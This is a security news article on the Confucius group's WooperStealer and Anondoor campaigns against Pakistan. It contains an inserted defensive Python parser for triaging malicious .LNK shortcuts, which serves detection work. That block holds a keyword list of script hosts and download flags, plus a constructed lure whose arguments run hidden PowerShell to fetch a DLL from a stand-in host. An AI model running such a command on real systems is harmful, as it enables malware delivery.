Confucius Hackers Hit Pakistan With New WooperStealer and Anondoor Malware

The Hacker News
October 2, 2025


Oct 02, 2025Ravie LakshmananMalware / Cyber Espionage

The threat actor known as Confucius has been attributed to a new phishing campaign that has targeted Pakistan with malware families like WooperStealer and Anondoor.

“Over the past decade, Confucius has repeatedly targeted government agencies, military organizations, defense contractors, and critical industries — especially in Pakistan – using spear-phishing and malicious documents as initial access vectors,” Fortinet FortiGuard Labs researcher Cara Lin said.

Confucius is a long-running hacking group that’s believed to have been active since 2013 and operating across South Asia. Recent campaigns undertaken by the threat actor have employed a Python-based backdoor called Anondoor, signaling an evolution of the group’s tradecraft and its technical agility.

One of the attack chains documented by Fortinet targeted users in Pakistan sometime in December 2024, tricking recipients into opening a .PPSX file, which then triggers the delivery of WooperStealer using DLL side-loading techniques.

A subsequent attack wave observed in March 2025 has been found to employ Windows shortcut (.LNK) files to unleash the malicious WooperStealer DLL, again launched using DLL side-loading, to steal sensitive data from compromised hosts.

Another .LNK file spotted in August 2025 also leveraged similar tactics to sideload a rogue DLL, only this time the DLL paves the way for Anondoor, a Python implant that’s designed to exfiltrate device information to an external server and await further tasks to execute commands, take screenshots, enumerate files and directories, and dump passwords from Google Chrome.

It’s worth noting that the threat actor’s use of Anondoor was documented in July 2025 by Seebug’s KnownSec 404 Team.

“The group has demonstrated strong adaptability, layering obfuscation techniques to evade detection and tailoring its toolset to align with shifting intelligence-gathering priorities,” Fortinet said. “Its recent campaigns not only illustrate Confucius’ persistence but also its ability to pivot rapidly between techniques, infrastructure, and malware families to maintain operational effectiveness.”

The disclosure comes as K7 Security Labs detailed an infection sequence associated with the Patchwork group. It commences with a malicious macro that downloads a .LNK file containing PowerShell code; that code downloads additional payloads and uses DLL side-loading to launch the primary malware while simultaneously displaying a decoy PDF document.
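Both campaigns above lean on Windows shortcut files as the lure: the Confucius .LNK files that side-load a rogue DLL, and the Patchwork .LNK that carries PowerShell. A defender triaging such attachments wants to see what the shortcut actually launches before it is double-clicked. The following is an added example, not code from Fortinet, K7 or the article: a small parser for the StringData section of the MS-SHLLINK format (header, LinkFlags, relative path, arguments, icon location, ShowCommand), plus a scoring heuristic. The script-host names, argument fragments and icon hints it looks for are assumptions of this example, and the two shortcut samples are constructed in the block itself so it runs offline.

```python
import struct
from dataclasses import dataclass

# Constants from the MS-SHLLINK (Shell Link binary file format) specification.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HEADER_SIZE = 0x4C
FLAG_HAS_IDLIST = 0x01
FLAG_HAS_LINKINFO = 0x02
FLAG_HAS_NAME = 0x04
FLAG_HAS_RELPATH = 0x08
FLAG_HAS_WORKDIR = 0x10
FLAG_HAS_ARGS = 0x20
FLAG_HAS_ICON = 0x40
FLAG_IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that starts the target minimised (window effectively hidden)

# Heuristics: assumptions of this example, not indicators published in the article.
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "rundll32", "regsvr32", "mshta", "wscript", "cscript")
ARG_HINTS = ("-enc", "-encodedcommand", "frombase64string", "downloadstring", "downloadfile",
             "invoke-webrequest", "invoke-expression", "iex ", "-w hidden", "-windowstyle hidden", "bypass")
DOC_ICON_HINTS = ("acrobat", "winword", "powerpnt", "excel", ".pdf", ".docx", ".pptx")


@dataclass
class LnkInfo:
    show_command: int
    name: str = ""
    relative_path: str = ""
    working_dir: str = ""
    arguments: str = ""
    icon_location: str = ""


def _read_string(data: bytes, pos: int, unicode: bool):
    """Read one StringData entry: 2-byte character count, then the characters (no terminator)."""
    count = struct.unpack_from("<H", data, pos)[0]
    pos += 2
    if unicode:
        return data[pos:pos + count * 2].decode("utf-16-le"), pos + count * 2
    return data[pos:pos + count].decode("cp1252", errors="replace"), pos + count


def parse_lnk(data: bytes) -> LnkInfo:
    """Parse the header and StringData of a .LNK; IDList/LinkInfo are skipped, ExtraData is ignored."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = HEADER_SIZE
    if flags & FLAG_HAS_IDLIST:                      # LinkTargetIDList: 2-byte size + list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & FLAG_HAS_LINKINFO:                    # LinkInfo: 4-byte size includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & FLAG_IS_UNICODE)
    info = LnkInfo(show_command=show_command)
    for flag, attr in ((FLAG_HAS_NAME, "name"), (FLAG_HAS_RELPATH, "relative_path"),
                       (FLAG_HAS_WORKDIR, "working_dir"), (FLAG_HAS_ARGS, "arguments"),
                       (FLAG_HAS_ICON, "icon_location")):
        if flags & flag:
            value, pos = _read_string(data, pos, unicode)
            setattr(info, attr, value)
    return info


def triage_lnk(info: LnkInfo) -> list:
    """Return sorted finding codes; an empty list means nothing in the heuristics fired."""
    findings = []
    target, args, icon = info.relative_path.lower(), info.arguments.lower(), info.icon_location.lower()
    if any(h in target for h in SCRIPT_HOSTS):
        findings.append("script_host_target")
        if any(h in icon for h in DOC_ICON_HINTS):   # looks like a document, launches a script host
            findings.append("document_icon_mismatch")
    if any(h in args for h in ARG_HINTS):
        findings.append("suspicious_arguments")
    if "http://" in args or "https://" in args:
        findings.append("remote_url_in_arguments")
    if info.show_command == SW_SHOWMINNOACTIVE:
        findings.append("hidden_window")
    return sorted(findings)


def build_lnk(relative_path: str, arguments: str = "", icon_location: str = "", show_command: int = 1) -> bytes:
    """Build a minimal Unicode .LNK (header + StringData only) so the parser can be exercised offline."""
    flags, parts = FLAG_IS_UNICODE, []
    for flag, s in ((FLAG_HAS_RELPATH, relative_path), (FLAG_HAS_ARGS, arguments), (FLAG_HAS_ICON, icon_location)):
        if s:
            flags |= flag
            parts.append(struct.pack("<H", len(s)) + s.encode("utf-16-le"))
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    return header + b"".join(parts)


# Constructed samples (hypothetical paths and an .invalid host), not files from the campaigns.
BENIGN_LNK = build_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", "notes.txt")
LURE_LNK = build_lnk(
    r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r'-w hidden -nop -c "Invoke-WebRequest http://example.invalid/stage -OutFile $env:TEMP\s.dll"',
    icon_location=r"C:\Program Files\Adobe\Acrobat\Acrobat.exe",
    show_command=SW_SHOWMINNOACTIVE,
)


def scan(samples: dict) -> dict:
    return {name: triage_lnk(parse_lnk(data)) for name, data in samples.items()}


if __name__ == "__main__":
    for name, findings in scan({"benign": BENIGN_LNK, "lure": LURE_LNK}).items():
        print(f"{name}: {'SUSPICIOUS ' + ', '.join(findings) if findings else 'clean'}")
```

The parser deliberately stops after StringData; real lures sometimes omit the relative path and put the target in an EnvironmentVariableDataBlock in ExtraData, so a production triage tool should also walk those blocks, and a shortcut with no findings is not thereby safe. The heuristic's value is in surfacing shortcuts whose icon says "document" while the target says "script host", which is the pattern both campaigns rely on.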

The final payload, for its part, establishes contact with the threat actor’s command-and-control (C2) server, gathers system information, and retrieves an encoded instruction that’s subsequently decrypted for execution using cmd.exe. It’s also equipped to take screenshots, upload files from the machine, and download files from a remote URL and save them locally in a temporary directory.

“The malware waits for a configurable period and retries sending the data up to 20 times, tracking failures to ensure persistent and stealthy data exfiltration without alerting the user or security systems,” the company said.
